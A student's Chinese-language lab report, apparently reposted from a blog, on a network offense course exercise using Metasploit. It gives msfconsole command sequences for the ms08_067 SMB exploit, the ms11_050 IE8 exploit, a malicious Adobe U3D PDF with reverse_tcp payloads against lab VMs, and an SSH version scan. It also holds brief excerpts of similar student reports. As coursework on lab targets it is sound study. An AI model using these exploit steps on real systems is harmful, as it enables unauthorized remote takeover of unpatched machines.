2018-2019-2 20165234 《网络对抗技术》Exp5 MSF基础应用

实验四 恶意代码分析

实验内容

  • 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    1.一个主动攻击实践,ms08_067(成功)

    2. 一个针对浏览器的攻击,ms11_050(成功)

    3. 一个针对客户端的攻击,Adobe(成功)

    4. 成功应用任何一个辅助模块,scanner/ssh/ssh_version,(成功,唯一)

基础问题

用自己的话解释什么是exploit,payload,encode:

  • Exploit:exploit 的英文意思为利用,它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用),有Exploit就肯定有漏洞。我自己的理解是一种攻击模块。
  • Payload:字面意思 “有效载荷,有效负荷,有效载重”。对于程序员来说就是在程序中起关键作用的代码。
  • Encode:对payload进行一定程度的编码,从而使之达到免杀的程度

实验步骤

查看各端的 IP地址:

攻击机Kali: 192.168.10.138

靶机Win7: 192.168.10.137

靶机WinXP:  192.168.10.139

靶机Win2k: 192.168.10.140

(一)一个主动攻击实践

Windows服务渗透攻击——MS08-067安全漏洞

ms08_067漏洞是的著名远程溢出漏洞,它的影响范围非常大,甚至一些vista的系统都会有这个远程溢出的漏洞。

  • 输入 msfconsole 进入控制台

  • 输入 search ms08_067 进行搜索漏洞

  • 复制所在位置并使用, use exploit/windows/smb/ms08_067_netapi

  • 输入 show options 可以查看当前配置

  • 依次输入以下指令,进行配置
# show payloads
# set payload generic/shell_reverse_tcp //tcp反向回连
# set LHOST 192.168.10.138 //设置攻击机IP
# set LPORT 5234 //攻击端口
# set RHOST 192.168.10.137 //设置靶机IP
# set target 0 //自动选择目标系统类型,匹配度较高
# exploit //探测并攻击

  • 输入 exploit 进行监听

  • 好的,渗透失败,看来Win7已经打过补丁了。输入info 并查看,就会发现,果然Available targets不包含Win7...
  • 接下来试试WinXP

出现如下情况: Exploit completed, but no session was created.

通过查找资料,得知导致该情况的原因可能有:

1. 被攻击机器的防火墙打开了。

2. 不满足漏洞触发条件;目标系统不受此漏洞影响。

3. 过程有遗漏或错误(payload、set target)。

我在检查了网络连通状况、靶机系统版本、防火墙,Kali端的payload、set target之后,发现均无问题,所以暂时没有找出解决此问题的办法。

接下来试试Win2k吧。

  • 渗透成功,接下来便可进行攻击啦。

参考资料

(二)一个针对浏览器的攻击

ms11_050

靶机:Win7;浏览器:IE8

  • 输入 msfconsole 进入控制台
  • 输入 search ms11_050 ,搜索漏洞的相关信息

  • 输入 use exploit/windows/browser/ms11_050_mshtml_cobjectelement ,使用该漏洞
  • 依次输入如下指令
# set payload windows/meterpreter/reverse_tcp //选择载荷
# set LHOST 192.168.10.138  //设置攻击机IP
# set LPORT 5234
# set RHOST 192.168.10.137  //设置靶机IP
# exploit

  • 将生成的网址输入Win7的IE8中

  • kali自动回连,渗透成功。

(三)一个针对客户端的攻击

Adobe PDF阅读器

靶机:Win7

  • 输入 msfconsole 进入控制台
  • 输入 search adobe 搜索漏洞的相关信息

  • 在经过不断地尝试和寻找之后,成功了找到了如下漏洞
  • 输入use windows/fileformat/adobe_reader_u3d
  • 依次输入以下指令:
# info //查看漏洞具体信息
# set payload windows/meterpreter/reverse_tcp //选择攻击载荷
# set LHOST 192.168.10.138 //攻击机IP
# set LPORT 5234 //设置端口号
# set FILENAME 20165234.pdf //设置文件名
# show options //查看设置
# exploit

  • 生成PDF文件 20165234.pdf

  • 在win7的靶机中打开20165221.pdf
  • 在攻击机中进行攻击,即可获得win7机的权限

(四)成功应用任何一个辅助模块

靶机:Win7 192.168.10.137

模块:scanner/ssh/ssh_version

  • 在msfconsole中通过命令 show auxiliary 查看所有的辅助模块

  • 输入 info 查看这个模块的作用,可见其用于扫描ssh的服务版本

  • 设置其所需要的参数并进行攻击

  • 成功地进行了扫描

实验中遇到的问题

  • 在做第一个主动攻击实践时就遇到了问题,具体问题及解决步骤我在前面贴出来了。
  • 在做adobe那部分的实验过程中,我运用命令生成了 20165234.pdf ,可是一直都找不到生成的文件存放在哪,主目录里找不到.msf4的文件夹,解决办法如下:

1. 先在“显示隐藏文件”处打钩,会发现 20165234.pdf 位于(home/.mf4/local)

2. 使用 cd .msf4/local ,输入 ls 便可查看到 20165234.pdf ,使用命令 mv 20165234.pdf /home 将pdf移动到主目录便可以看见了 。

离实战还缺些什么技术或步骤

  • 信息收集扫描的重要性,掌握准确的信息是成功的关键因素。
  • msf只是攻击漏洞的一个工具,要想针对某个漏洞进行攻击,还是得参考网上搜索的资料和步骤。
  • 我现在只能依赖已有的攻击教程,根据想要的攻击的方法选择已有的模块进行攻击。所以想真正用好msf,还得多话费功夫去自行研究。

实验总结与体会

  • 我觉得本次实验逻辑较为清晰,总体来说实验过程还是比较顺利的。
  • 寻找靶机和选择漏洞的过程就花费了很大的力气,由此可见攻击漏洞的专一性,对操作系统和软件版本都有细致的要求。
  • 没有任何一个程序是十全十美的,所以在平时的使用过程中就要做到及时更新、注意打补丁。

原文地址:https://www.cnblogs.com/IconicV/p/10744793.html

时间: 2024-10-10 07:26:28

2018-2019-2 20165234 《网络对抗技术》Exp5 MSF基础应用的相关文章

2018-2019~6 20165107 网络对抗技术 Exp5 MSF基础应用

20165107 网络对抗技术 Exp5 MSF基础应用 1.实验内容 1.1一个主动攻击实践,如ms08_067(成功) 1.2 一个针对浏览器的攻击,如ms11_050(成功) 1.3 一个针对客户端的攻击,如Adobe(成功) 1.4 成功应用任何一个辅助模块,如scanner/rdp/ms12_020_check(唯一,成功) 2.基础问题回答:用自己的话解释什么是exploit,payload,encode. exploit相当于是载具,是渗透攻击模块,将负责攻击的代码传送到靶机中.

20155232《网络对抗》Exp5 MSF基础应用

20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击,相当于一个载具 payload:就是攻击的代码,是载荷. encode:为了帮助攻击载荷避免被杀软发现,进行伪装. 实践总结与体会 在辅助模块这里,可以发现很多旧版本的软件有漏洞,从而可以进行相关的攻击,在此次实验中就体验了旧版本有漏洞的一些软件进行了攻击并且很轻易就实现了,所以有漏洞时,一定要尽快打补丁,

20145311王亦徐 《网络对抗技术》 MSF基础应用

20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms08_067渗透为例 针对浏览器的攻击,以漏洞10_046为例 针对客户端的攻击,对具体应用的攻击,以对Adobe阅读器的漏洞攻击为例 最后是一个auxiliary模块的例子的应用 基础问题回答 1.解释exploit,payload,encode是什么 exploit是渗透攻击模块,利用系统服务应用中的漏洞

20145321 《网络对抗技术》 MSF基础应用

20145321 <网络对抗技术> MSF基础应用 MS08_067漏洞渗透攻击 先查看kali和windows的IP地址 进入msfconsole,选择使用ms08_067的exploit,再选择具体要负载使用的payload,设置载荷,主机ip,靶机ip 输入exploit命令即可攻击客户端.获取shell.可查看靶机IP

《网络对抗》Exp5 MSF基础应用

20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:漏洞利用,与靶机进行交互,攻击靶机的最后一步 payload:有效载荷,后面一般加要对靶机进行攻击的代码,可以实现任何运行在受害者环境中的程序所能做的事情 encode:编码器,对代码进行异或运算.去除坏字符等等,保护payload不被发现 二.实践过程 1.Windows服务渗透攻击--MS08-067安全漏洞 ①攻击机:kali ②靶机:

20155330 《网络对抗》 Exp5 MSF基础应用

20155330 <网络对抗> Exp5 MSF基础应用 实践过程记录 Windows服务渗透:MS08_067漏洞攻击 攻击机:kali IP地址:192.168.124.132 靶机:windows XP SP3 简体中文 IP地址:192.168.124.135 输入命令use exploit/windows/smb/ms08_067_netapi 设置参数 set payload generic/shell_reverse_tcptcp反向回连 set LHOST 192.168.23

20155333 《网络对抗》 Exp5 MSF基础应用

20155333 <网络对抗> Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:攻击手段,是能使攻击武器(payload)的方法: payload:攻击武器,真正具有攻击性的代码: encode:编码方式,根据payload将要被放置的环境选择合适的编码方式,使它能够正常的运行. 实践 一个主动攻击实践,如ms08_067 ①攻击机:kali ②靶机:windows XP SP3(English) 在攻击机kali输入m

20155331《网络对抗》Exp5 MSF基础应用

20155331<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode 答:exploit就是漏洞利用.exploit就是利用一切可以利用的工具.采用一切可以采用的方法.找到一切可以找到的漏洞,并且通过对漏洞资料的分析研究,从而达到获取网站用户资料文档.添加自定义用户.甚至侵入网站获得管理员权限控制整个网站的最终目的. payload是攻击载荷,exploit把它传送到靶机中后,它就负责执行相应的攻击代码. encode是编码,实现

20145235李涛《网络对抗》Exp5 MSF基础应用

基础问答 用自己的话解释什么是exploit,payload,encode? exploit:相当于搬运工,把攻击代码传送到靶机中. payload:相当于shellcode. encode:相当于包装者,对攻击代码进行编码. adobe_toolbutton漏洞工具 首先生成后门程序 传到到靶机 设置监听,在靶机上打开后门程序,发现攻击成功,查看靶机的信息 ms08_067漏洞攻击 这个攻击需要设置攻击机和靶机的ip地址,然后直接开始攻击 攻击成功,可以查看到靶机的系统信息 ms10_046漏

20155326刘美岑《网络对抗》Exp5 MSF基础应用

基础问题回答 解释exploit,payload,encode是什么: exploit:就是一个简单的攻击指令,在配置完成之后下发攻击命令. payload:是攻击载荷,是我们在攻击过程中真正用到的部分,进行攻击的实体. encode:是重新进行编码,伪装此次攻击,躲过查杀. 实验过程记录 主动攻击实践:ms06_040 首先,在实验前,检查两个虚拟机能否互相ping通 在kali中打开msf 我首先尝试使用ms06_040进行主动攻击 之后,用show targets查看该漏洞可以攻击的系统版